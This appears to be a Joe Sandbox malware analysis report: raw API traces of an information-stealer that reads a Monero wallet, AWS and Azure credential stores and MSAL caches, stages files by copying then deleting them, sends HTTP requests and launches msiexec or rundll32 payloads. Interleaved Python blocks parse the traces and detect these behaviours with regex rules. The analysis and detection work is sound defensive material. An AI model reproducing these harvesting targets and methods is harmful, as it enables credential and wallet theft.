                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E25EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00E25F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E25F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E25F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00E25FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00E25FBD
                        • HttpOpenRequestA.WININET(00000000,0196F988,?,0196F4B0,00000000,00000000,00400100,00000000), ref: 00E25BF8
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • InternetCloseHandle.WININET(00000000), ref: 00E25FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: 32746230f72037f71b7801a1a004403f08dd928f3a955fcf17abb8fce5f68f6c
                        • Instruction ID: 9d98aed8f6300ce2a398e83f473973cbab09cba7e0d39d0e82119d9460dfe337
                        • Opcode Fuzzy Hash: 32746230f72037f71b7801a1a004403f08dd928f3a955fcf17abb8fce5f68f6c
                        • Instruction Fuzzy Hash: B6120F72920118AADB19EBA0DC9DFEEB7B8BF54700F4451A9F14673091DF342A89CF61
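The "APIs" listing above is raw plugin output: hex arguments and bare refs, with the interesting constants left undecoded. The Python below is an added example for reading such listings, not Joe Sandbox or sample code. It parses the line grammar as inferred from this page, names the Win32 constants that appear in the entries (the HttpOpenRequestA flags 00400100 are INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, InternetSetOptionA option 0000001F is INTERNET_OPTION_SECURITY_FLAGS, SHGetFolderPathA CSIDL 0000001C is CSIDL_LOCAL_APPDATA) and tags the behaviour of each function. The embedded sample block merges lines copied from several function entries on this page; the constant tables cover only values seen here.

```python
"""Parse the 'APIs' trace lines of a Joe Sandbox function listing and decode
the Win32/WinINet constants they carry.

Added example for reading this report; not Joe Sandbox or sample code. The
line grammar is inferred from the listing above; the constant tables are the
documented Win32 values. SAMPLE_BLOCK merges lines copied from several
function entries on this page.
"""
import re
from collections import Counter

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# HttpOpenRequestA dwFlags (7th argument) is a bitmask.
HTTP_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
# (api, zero-based argument index) -> enumerated values seen in this report.
ENUMS = {
    ("InternetSetOptionA", 1): {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"},
    ("InternetConnectA", 5): {3: "INTERNET_SERVICE_HTTP"},
    ("SHGetFolderPathA", 1): {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"},
    ("CreateFileA", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileA", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING"},
    ("SetFilePointer", 3): {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"},
    ("RegOpenKeyExA", 3): {0x20019: "KEY_READ", 0xF003F: "KEY_ALL_ACCESS"},
}


def parse_api_line(line):
    """Return one parsed call, or None for header lines such as 'Strings'."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw is not None else []
    return {"api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": m.group("ref"), "subcall": m.group("sub")}


def _hex(token):
    """Trace arguments are hex; '?' and string literals are not decodable."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def decode_call(call):
    """Name the constants in a call's arguments where a table is known."""
    out = []
    if call["api"] == "HttpOpenRequestA" and len(call["args"]) > 6:
        v = _hex(call["args"][6])
        if v is not None:
            names = [n for bit, n in HTTP_FLAGS.items() if v & bit]
            out.append("dwFlags=" + ("|".join(names) or hex(v)))
    for (api, idx), table in ENUMS.items():
        if call["api"] == api and len(call["args"]) > idx:
            v = _hex(call["args"][idx])
            if v in table:
                out.append(f"arg{idx}={table[v]}")
    return out


def summarize(block):
    """Parse a whole 'APIs' block into calls, decoded constants and behaviour tags."""
    calls = [c for c in map(parse_api_line, block.splitlines()) if c]
    apis = Counter(c["api"] for c in calls)
    decoded = {}
    for c in calls:
        d = decode_call(c)
        if d:
            decoded[f'{c["api"]}@{c["ref"]}'] = d
    tags = set()
    if {"HttpOpenRequestA", "HttpSendRequestA", "InternetReadFile"} & set(apis):
        tags.add("wininet_http")              # C2 / exfiltration over HTTP
    if "CopyFileA" in apis and "DeleteFileA" in apis:
        tags.add("copy_then_delete_staging")  # copies a target file, deletes after use
    if any("wallet" in a.lower() for c in calls for a in c["args"]):
        tags.add("crypto_wallet_path")
    if "CryptStringToBinaryA" in apis:
        tags.add("base64_decode")
    return {"calls": calls, "apis": apis, "decoded": decoded, "tags": tags}


SAMPLE_BLOCK = r"""
• GetProcessHeap.KERNEL32(00000000,?), ref: 00E25E93
• RtlAllocateHeap.NTDLL(00000000), ref: 00E25E9A
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E25F2F
• InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E25F4C
• InternetCloseHandle.WININET(00000000), ref: 00E25FB0
• HttpOpenRequestA.WININET(00000000,0196F988,?,0196F4B0,00000000,00000000,00400100,00000000), ref: 00E25BF8
  • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
  • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
  • Part of subcall function 00E26280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E263BF
  • Part of subcall function 00E38DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E38E0B
Strings
Memory Dump Source
"""

if __name__ == "__main__":
    s = summarize(SAMPLE_BLOCK)
    print(dict(s["apis"]), s["decoded"], sorted(s["tags"]), sep="\n")
```

Paste any "APIs" block from the report into `summarize` to get the same summary; the decoder only names values it has a table for and leaves everything else as the hex the plugin recorded, so a `?` or a runtime-decrypted string pointer (the 0196xxxx arguments here) is never misreported.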
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E38B60: GetSystemTime.KERNEL32(00E40E1A,0196E990,00E405AE,?,?,00E213F9,?,0000001A,00E40E1A,00000000,?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E38B86
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E2CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E2D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E2D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D208
                        • lstrcat.KERNEL32(?,00E41478), ref: 00E2D217
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D22A
                        • lstrcat.KERNEL32(?,00E4147C), ref: 00E2D239
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D24C
                        • lstrcat.KERNEL32(?,00E41480), ref: 00E2D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D26E
                        • lstrcat.KERNEL32(?,00E41484), ref: 00E2D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D290
                        • lstrcat.KERNEL32(?,00E41488), ref: 00E2D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D2B2
                        • lstrcat.KERNEL32(?,00E4148C), ref: 00E2D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D2D4
                        • lstrcat.KERNEL32(?,00E41490), ref: 00E2D2E3
                          • Part of subcall function 00E3A820: lstrlen.KERNEL32(00E24F05,?,?,00E24F05,00E40DDE), ref: 00E3A82B
                          • Part of subcall function 00E3A820: lstrcpy.KERNEL32(00E40DDE,00000000), ref: 00E3A885
                        • lstrlen.KERNEL32(?), ref: 00E2D32A
                        • lstrlen.KERNEL32(?), ref: 00E2D339
                          • Part of subcall function 00E3AA70: StrCmpCA.SHLWAPI(01968980,00E2A7A7,?,00E2A7A7,01968980), ref: 00E3AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 00E2D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: f450f422c54c9479a386aa4f3349e771d51d4c32c9d2a4b470579692dfe6f4c2
                        • Instruction ID: aac3d3d1dc894b80369204406a96545b334ddf650ef9d87e9c02bfc1a7438354
                        • Opcode Fuzzy Hash: f450f422c54c9479a386aa4f3349e771d51d4c32c9d2a4b470579692dfe6f4c2
                        • Instruction Fuzzy Hash: B7E12272910108ABCB18FBA0DD9AEEE77B8BF54300F145169F187B7091DE35AE45CB62
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0196DF38,00000000,?,00E4144C,00000000,?,?), ref: 00E2CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E2CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00E2CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E2CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E2CAD9
                        • StrStrA.SHLWAPI(?,0196DF08,00E40B52), ref: 00E2CAF7
                        • StrStrA.SHLWAPI(00000000,0196DF50), ref: 00E2CB1E
                        • StrStrA.SHLWAPI(?,0196E678,00000000,?,00E41458,00000000,?,00000000,00000000,?,01968A40,00000000,?,00E41454,00000000,?), ref: 00E2CCA2
                        • StrStrA.SHLWAPI(00000000,0196E718), ref: 00E2CCB9
                          • Part of subcall function 00E2C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E2C871
                          • Part of subcall function 00E2C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E2C87C
                        • StrStrA.SHLWAPI(?,0196E718,00000000,?,00E4145C,00000000,?,00000000,019688C0), ref: 00E2CD5A
                        • StrStrA.SHLWAPI(00000000,01968AB0), ref: 00E2CD71
                          • Part of subcall function 00E2C820: lstrcat.KERNEL32(?,00E40B46), ref: 00E2C943
                          • Part of subcall function 00E2C820: lstrcat.KERNEL32(?,00E40B47), ref: 00E2C957
                          • Part of subcall function 00E2C820: lstrcat.KERNEL32(?,00E40B4E), ref: 00E2C978
                        • lstrlen.KERNEL32(00000000), ref: 00E2CE44
                        • CloseHandle.KERNEL32(00000000), ref: 00E2CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: f920b864b4b7dfe0ff9a98010036b03e2b0e9e786d5066c8d4a73561cd28e392
                        • Instruction ID: 0ad81dbf02c6bc4b10544b355dadedb1cab0b5083171444758b468b27c172392
                        • Opcode Fuzzy Hash: f920b864b4b7dfe0ff9a98010036b03e2b0e9e786d5066c8d4a73561cd28e392
                        • Instruction Fuzzy Hash: 05E10F72900108ABDB18FBA0DC99FEEBBB8AF54300F445169F14677191DF346A8ACB61
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • RegOpenKeyExA.ADVAPI32(00000000,0196C140,00000000,00020019,00000000,00E405B6), ref: 00E383A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E38426
                        • wsprintfA.USER32 ref: 00E38459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E3847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E3848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E38499
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: e3b0ba09dfff589d2f29ac718314d1401872ca7aa79a2aa8200d0d0c01d6a808
                        • Instruction ID: 5ea4aa05ef40b8a96a8159441394874e3a89ff3105370024f21331a50e241295
                        • Opcode Fuzzy Hash: e3b0ba09dfff589d2f29ac718314d1401872ca7aa79a2aa8200d0d0c01d6a808
                        • Instruction Fuzzy Hash: 0781DBB1910218AADB28EF54CD99FEA7BB8BB48700F0092D9F149B6140DF756B85CF94
                        APIs
                          • Part of subcall function 00E38DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E38E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00E34DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 00E34DCD
                          • Part of subcall function 00E34910: wsprintfA.USER32 ref: 00E3492C
                          • Part of subcall function 00E34910: FindFirstFileA.KERNEL32(?,?), ref: 00E34943
                        • lstrcat.KERNEL32(?,00000000), ref: 00E34E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 00E34E59
                          • Part of subcall function 00E34910: StrCmpCA.SHLWAPI(?,00E40FDC), ref: 00E34971
                          • Part of subcall function 00E34910: StrCmpCA.SHLWAPI(?,00E40FE0), ref: 00E34987
                          • Part of subcall function 00E34910: FindNextFileA.KERNEL32(000000FF,?), ref: 00E34B7D
                          • Part of subcall function 00E34910: FindClose.KERNEL32(000000FF), ref: 00E34B92
                        • lstrcat.KERNEL32(?,00000000), ref: 00E34EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E34EE5
                          • Part of subcall function 00E34910: wsprintfA.USER32 ref: 00E349B0
                          • Part of subcall function 00E34910: StrCmpCA.SHLWAPI(?,00E408D2), ref: 00E349C5
                          • Part of subcall function 00E34910: wsprintfA.USER32 ref: 00E349E2
                          • Part of subcall function 00E34910: PathMatchSpecA.SHLWAPI(?,?), ref: 00E34A1E
                          • Part of subcall function 00E34910: lstrcat.KERNEL32(?,0196FAF8), ref: 00E34A4A
                          • Part of subcall function 00E34910: lstrcat.KERNEL32(?,00E40FF8), ref: 00E34A5C
                          • Part of subcall function 00E34910: lstrcat.KERNEL32(?,?), ref: 00E34A70
                          • Part of subcall function 00E34910: lstrcat.KERNEL32(?,00E40FFC), ref: 00E34A82
                          • Part of subcall function 00E34910: lstrcat.KERNEL32(?,?), ref: 00E34A96
                          • Part of subcall function 00E34910: CopyFileA.KERNEL32(?,?,00000001), ref: 00E34AAC
                          • Part of subcall function 00E34910: DeleteFileA.KERNEL32(?), ref: 00E34B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 59865420c23faa6b981f34cc2075cd35c8f7246cf58522a0cc1120e7743af29e
                        • Instruction ID: e6d248e8d5a204dab05e41383559e8fe4b17f6bb053637190d74e78dc78041de
                        • Opcode Fuzzy Hash: 59865420c23faa6b981f34cc2075cd35c8f7246cf58522a0cc1120e7743af29e
                        • Instruction Fuzzy Hash: 014184BAA4030866CB24F760EC4BFED3678AB64700F4054D4B285760C1EEB597C9CB92
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E3906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 9ccc36ba17821a4f45223150c4e9e61d902a4f2b830548f8fec442a6898f4273
                        • Instruction ID: ebf9edb38392b51a34ff8552969eb55173d2ac798a36d4503dd75321a2696907
                        • Opcode Fuzzy Hash: 9ccc36ba17821a4f45223150c4e9e61d902a4f2b830548f8fec442a6898f4273
                        • Instruction Fuzzy Hash: 7B71ED71A10208EFDB14EBE4D989FEEBBB8BF48300F108548F555B7294DB79A905CB60
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E331C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E3335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E334EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 8089373da1d109309ac464b43782113201f68bdf334f51c404a3d60280ad4ae9
                        • Instruction ID: 8f998dce4da23afa9cf0fd55116e9b6ffecf14657859f3f64281b34659a24484
                        • Opcode Fuzzy Hash: 8089373da1d109309ac464b43782113201f68bdf334f51c404a3d60280ad4ae9
                        • Instruction Fuzzy Hash: 91121072800108AADB19FFA0DC9AFDDBBB8AF54300F545169F54676191EF342B8ACF52
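Two of the entries above map directly to host telemetry a SOC can alert on: the directory walk over \.azure\, \.aws\ and \.IdentityService\ (SHGetFolderPathA with CSIDL 0000001C, FindFirstFileA/FindNextFileA over *.*, PathMatchSpecA, then CopyFileA followed by DeleteFileA), and the ShellExecuteEx calls whose string IDs are the msiexec.exe /i "..." /passive and rundll32.exe ... .dll command lines. The Python below is an added example of detection logic over such events, not part of the report or the sample. The event shape (type, image, path or parent and cmdline), the allowlists of legitimate readers and installer parents, and the sample paths are assumptions to tune per estate.

```python
r"""Host-side detection for two behaviours recorded in this report: harvesting
of cloud-credential stores under the user profile (\.aws\, \.azure\,
\.IdentityService\msal.cache) with copy-then-delete staging, and follow-up
payload execution via msiexec.exe /i "<file>.msi" /passive or
rundll32.exe <file>.dll.

Added example, not part of the report or the sample. Events are constructed
in a simplified EDR-like shape (type, image, path / parent / cmdline); the
field names, the allowlists and the sample paths are assumptions to tune.
"""
import re
from collections import defaultdict

STORE_RE = re.compile(r"\\(\.aws|\.azure|\.IdentityService)\\", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\|\\ProgramData\\|\\Temp\\", re.IGNORECASE)
MSI_PASSIVE_RE = re.compile(r'/i\s+"?[^"\s]+\.msi"?.*?/passive', re.IGNORECASE)
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+\.dll)', re.IGNORECASE)

# Images expected to read those stores (illustrative allowlist, an assumption).
STORE_READERS = {"aws.exe", "az.cmd", "python.exe", "powershell.exe", "pwsh.exe", "node.exe"}
# Parents from which msiexec /passive is unremarkable (illustrative, an assumption).
INSTALLER_PARENTS = {"explorer.exe", "services.exe", "msiexec.exe", "setup.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, offending image, detail) tuples for a stream of events."""
    alerts = []
    stores = defaultdict(set)    # image -> credential stores it read
    created = defaultdict(set)   # image -> files it created
    for ev in events:
        img = ev["image"]
        if ev["type"] == "file_read":
            m = STORE_RE.search(ev["path"])
            if m and basename(img) not in STORE_READERS:
                stores[img].add(m.group(1).lower())
        elif ev["type"] == "file_create":
            created[img].add(ev["path"].lower())
        elif ev["type"] == "file_delete":
            # CopyFileA to a scratch file followed by DeleteFileA on the same path.
            if ev["path"].lower() in created[img]:
                alerts.append(("copy_then_delete_staging", img, ev["path"]))
        elif ev["type"] == "proc_create":
            child, parent = basename(img), basename(ev["parent"])
            if child == "msiexec.exe" and MSI_PASSIVE_RE.search(ev["cmdline"]) and parent not in INSTALLER_PARENTS:
                alerts.append(("msiexec_passive_from_unusual_parent", ev["parent"], ev["cmdline"]))
            if child == "rundll32.exe":
                m = RUNDLL_RE.search(ev["cmdline"])
                if m and USER_WRITABLE_RE.search(m.group(1)):
                    alerts.append(("rundll32_dll_from_user_writable_path", ev["parent"], m.group(1)))
    # One process reading two or more distinct stores is the stealer pattern; a single
    # store read by an unlisted tool is left to allowlist review rather than alerted.
    for img, seen in stores.items():
        if len(seen) >= 2:
            alerts.append(("multi_store_cloud_credential_read", img, ",".join(sorted(seen))))
    return alerts


STEALER = r"C:\Users\u\AppData\Local\Temp\file.exe"
SAMPLE_EVENTS = [  # constructed telemetry, not taken from the report
    {"type": "file_read", "image": STEALER, "path": r"C:\Users\u\.aws\credentials"},
    {"type": "file_read", "image": STEALER, "path": r"C:\Users\u\.azure\azureProfile.json"},
    {"type": "file_read", "image": STEALER, "path": r"C:\Users\u\AppData\Local\.IdentityService\msal.cache"},
    {"type": "file_read", "image": r"C:\Program Files\Amazon\AWSCLIV2\aws.exe", "path": r"C:\Users\u\.aws\credentials"},
    {"type": "file_create", "image": STEALER, "path": r"C:\Users\u\AppData\Local\Temp\a1b2.tmp"},
    {"type": "file_delete", "image": STEALER, "path": r"C:\Users\u\AppData\Local\Temp\a1b2.tmp"},
    {"type": "proc_create", "image": r"C:\Windows\system32\msiexec.exe", "parent": STEALER,
     "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\u\AppData\Local\Temp\pkg.msi" /passive'},
    {"type": "proc_create", "image": r"C:\Windows\system32\msiexec.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\u\Downloads\vendor.msi" /passive'},
    {"type": "proc_create", "image": r"C:\Windows\system32\rundll32.exe", "parent": STEALER,
     "cmdline": r"C:\Windows\system32\rundll32.exe C:\Users\u\AppData\Local\Temp\upd.dll,Start"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(*alert, sep=" | ")
```

The cloud-store rule fires on the combination (two or more distinct stores read by one unlisted process), which is what separates a stealer from the AWS CLI or an MSAL-backed app reading its own cache; the msiexec and rundll32 rules key on the parent and on a user-writable DLL path respectively, since the command-line strings themselves are identical to legitimate installer use.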
                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E26280: InternetOpenA.WININET(00E40DFE,00000001,00000000,00000000,00000000), ref: 00E262E1
                          • Part of subcall function 00E26280: StrCmpCA.SHLWAPI(?,0196FA58), ref: 00E26303
                          • Part of subcall function 00E26280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E26335
                          • Part of subcall function 00E26280: HttpOpenRequestA.WININET(00000000,GET,?,0196F4B0,00000000,00000000,00400100,00000000), ref: 00E26385
                          • Part of subcall function 00E26280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E263BF
                          • Part of subcall function 00E26280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E263D1
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E35318
                        • lstrlen.KERNEL32(00000000), ref: 00E3532F
                          • Part of subcall function 00E38E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E38E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00E35364
                        • lstrlen.KERNEL32(00000000), ref: 00E35383
                        • lstrlen.KERNEL32(00000000), ref: 00E353AE
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
